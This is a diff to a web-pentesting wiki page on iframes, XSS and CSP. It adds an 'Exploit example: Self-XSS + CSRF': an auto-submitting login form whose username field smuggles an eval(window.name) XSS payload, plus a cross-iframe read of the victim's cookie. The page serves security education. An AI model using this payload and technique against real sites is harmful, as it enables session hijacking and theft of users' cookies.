Update iframes-in-xss-and-csp.md

src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md

@@ -199,10 +199,32 @@ window.top[1].document.cookie = 'foo=bar';            // write
 alert(window.top[2].document.cookie);                 // read -> foo=bar
 ```
 
-To embed 3rd-party content in pages that already enforce COEP you can now simply use:
+- Exploit example: Self-XSS + CSRF
 
-```html
-<iframe credentialless src="https://example.com/public-widget"></iframe>
+In this attack, the attacker prepares a malicious webpage with 2 iframes:
+
+- An iframe that loads the victim's page with the `credentialless` flag with a CSRF that triggers a XSS (Imagin a Self-XSS in the username of the user):
+  ```html
+  <html>
+  <body>
+    <form action="http://victim.domain/login" method="POST">
+      <input type="hidden" name="username" value="attacker_username<img src=x onerror=eval(window.name)>" />
+      <input type="hidden" name="password" value="Super_s@fe_password" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <script>
+      document.forms[0].submit();
+    </script>
+  </body>
+  </html>
+  ```
+
+- Another iframe that actually has the user logged in (without the `credentialless` flag).
+
+Then, from the XSS it's possible to access the other iframe as they have the same SOP and steal the cookie for example executing:
+
+```javascript
+alert(window.top[1].document.cookie);
 ```
 
 ### fetchLater Attack